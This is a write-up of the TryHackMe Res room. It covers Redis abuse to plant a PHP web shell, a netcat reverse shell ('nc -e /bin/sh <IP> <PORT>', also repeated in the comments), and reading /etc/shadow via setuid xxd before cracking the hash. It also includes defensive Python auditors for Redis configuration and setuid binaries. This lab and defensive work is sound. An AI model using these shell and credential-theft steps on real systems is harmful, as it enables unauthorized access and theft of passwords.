Introduction
This is my write-up for TryHackMe's Res Room.
Enumeration
Using nmap, I saw that this box has 2 ports open.
Checking port 80, I found that it is running Apache.
Port 6379 is Redis. Connecting to it with Telnet or netcat, we can perform several tasks such as getting the system info: running the "INFO" command returns the Redis version, operating system, architecture, and more.
HackTricks provides an excellent example of how to get a shell on a Redis server. According to it, we must first know the path of the website folder. Since we know the web server is Apache, we assume that the path is /var/www/html. Using this assumption, we can set the Redis working directory to that path and write a file there. To test whether it works, I wrote a simple PHP file that calls phpinfo().
Checking the webpage, I found that it works.
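The write-to-web-root trick above only works because this Redis instance accepts clients from the network without a password and still lets them run CONFIG SET dir and CONFIG SET dbfilename. Here is an added example, my own rather than code from the room or from HackTricks, of a small redis.conf auditor that flags exactly those conditions, with the weak configuration beside its hardened counterpart. Both configuration texts are constructed for illustration, and the requirepass value is a placeholder.

```python
"""Audit a redis.conf for the settings that let any client on the network
repoint `dir`/`dbfilename` and drop a file into a web root.
Added defensive example for this write-up; not from the room or HackTricks."""

# Weak configuration, constructed to mirror the conditions the write-up
# relies on: reachable from the network, no password, CONFIG still enabled.
WEAK_CONF = """\
bind 0.0.0.0
port 6379
protected-mode no
dir /var/lib/redis
dbfilename dump.rdb
"""

# Hardened counterpart (constructed): loopback only, password required,
# CONFIG and DEBUG renamed away so `CONFIG SET dir` is no longer reachable.
# The requirepass value is a placeholder, not a real secret.
HARDENED_CONF = """\
bind 127.0.0.1
port 6379
protected-mode yes
requirepass REPLACE-WITH-LONG-RANDOM-SECRET
rename-command CONFIG ""
rename-command DEBUG ""
dir /var/lib/redis
dbfilename dump.rdb
"""

# Directories a web server commonly serves; a Redis dump landing here is
# the condition the write-up abuses.
WEB_ROOTS = ("/var/www", "/srv/www", "/usr/share/nginx")


def parse_conf(text):
    """Map each directive to the list of argument strings it was given.
    Directives such as rename-command may repeat, hence lists."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):   # blank or full-line comment
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        val = parts[1].strip() if len(parts) > 1 else ""
        conf.setdefault(key, []).append(val)
    return conf


def audit(conf):
    """Return a list of (directive, problem) findings for a parsed config."""
    findings = []
    binds = conf.get("bind", [])
    # No bind line means every interface; so do the wildcard addresses.
    if not binds or any(tok.lstrip("-") in ("0.0.0.0", "*", "::", "::*")
                        for b in binds for tok in b.split()):
        findings.append(("bind", "listens on all interfaces"))
    if conf.get("protected-mode", ["yes"])[-1].lower() != "yes":
        findings.append(("protected-mode", "disabled, remote clients are not refused"))
    if not conf.get("requirepass", [""])[-1]:
        findings.append(("requirepass", "unset, any client may run CONFIG SET dir/dbfilename"))
    renamed = {v.split()[0].upper() for v in conf.get("rename-command", []) if v.split()}
    if "CONFIG" not in renamed:
        findings.append(("rename-command", "CONFIG still reachable under its real name"))
    for d in conf.get("dir", []):
        if d.startswith(WEB_ROOTS):
            findings.append(("dir", f"dump directory {d} is inside a web root"))
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        found = audit(parse_conf(text))
        print(f"{label}: {len(found)} finding(s)")
        for directive, problem in found:
            print(f"  {directive}: {problem}")
```

Point it at a real file with `audit(parse_conf(open("/etc/redis/redis.conf").read()))`. On Redis 6 and later, an ACL rule that strips the @dangerous category from the default user is the more current way to get what rename-command does here; the audit above still reports the legacy setting because it is what older builds rely on.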
I found that I could then run commands. Below is an example of running both the id and ifconfig commands.
Going back to the browser and setting cmd equal to:
nc -e /bin/sh <IP> <PORT>
I find that there is a shell on my netcat listener.
Privilege Escalation
Looking for files with the SUID bit set, I found that xxd was among them.
From GTFOBins, I found that I could use xxd to read files that require higher privileges. With it, I was able to read the contents of /etc/shadow.
Using john, I was able to crack the hash and get the user's password. With the password, I was able to log on as the user. It turns out that the user also had full sudo privileges.
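A setuid xxd is what turns a file-read primitive into a full compromise here, and it is the kind of thing a routine baseline comparison catches long before anyone attempts it. The following is an added example of my own, not part of the room: it compares the setuid/setgid files found on a host against an approved baseline and reports the rest. The baseline and the sample listing are constructed for illustration; a real baseline should be captured from a known-good build of the same image.

```python
"""Compare setuid/setgid files on a host against an approved baseline and
report anything unexpected (such as the setuid xxd in this write-up).
Added defensive example; not part of the TryHackMe room."""
import os
import stat

# Constructed baseline of binaries that legitimately carry setuid on a typical
# Ubuntu host. Capture the real list from a known-good build, do not hand-type it.
BASELINE = {
    "/usr/bin/sudo",
    "/usr/bin/passwd",
    "/usr/bin/su",
    "/usr/bin/mount",
    "/usr/bin/umount",
}


def special_bits(mode):
    """Return which of setuid/setgid are set on a regular file's mode bits."""
    bits = []
    if stat.S_ISREG(mode):
        if mode & stat.S_ISUID:
            bits.append("setuid")
        if mode & stat.S_ISGID:
            bits.append("setgid")
    return bits


def unexpected_entries(entries, baseline=BASELINE):
    """entries: iterable of (path, mode) pairs, e.g. from scan_fs().
    Returns a sorted list of (path, bits) for files carrying setuid or setgid
    that are not in the baseline."""
    out = []
    for path, mode in entries:
        bits = special_bits(mode)
        if bits and path not in baseline:
            out.append((path, bits))
    return sorted(out)


def scan_fs(root="/"):
    """Walk the filesystem without following symlinks, yielding (path, mode)."""
    skip = {"/proc", "/sys", "/dev", "/run"}   # pseudo filesystems, no binaries
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in skip]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            yield path, st.st_mode


# Constructed sample listing mirroring the box: xxd has the setuid bit.
# 0o100000 marks a regular file; 0o4000 is setuid, 0o2000 is setgid.
SAMPLE_ENTRIES = [
    ("/usr/bin/sudo",   0o104755),
    ("/usr/bin/passwd", 0o104755),
    ("/usr/bin/xxd",    0o104755),   # not in baseline -> reported
    ("/usr/bin/ls",     0o100755),   # no special bits -> ignored
    ("/usr/bin/wall",   0o102755),   # setgid, not in baseline -> reported
]

if __name__ == "__main__":
    for path, bits in unexpected_entries(SAMPLE_ENTRIES):
        print(f"{path}: {'+'.join(bits)} not in baseline")
    # Live check of the host instead of the sample:
    # for path, bits in unexpected_entries(scan_fs()): print(path, bits)
```

Run it from cron or a config-management check and alert on any non-empty result; a new setuid binary appearing outside the baseline is worth an incident ticket on its own, whatever the binary is.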
Comments
Thanks for the write-up. I never even thought of nc for access, I used a similar method after I installed redis-cli and your initial comments helped.
Regards
K

Glad it helped

Can you explain more about
"Going back to the browser, and setting cmd equal to:
nc -e /bin/sh"

So once you've written commandshell.php on the target, you type the following on your browser:
/commandshell.php?cmd=nc -e /bin/sh
The "cmd" is actually the GET variable the PHP file would process.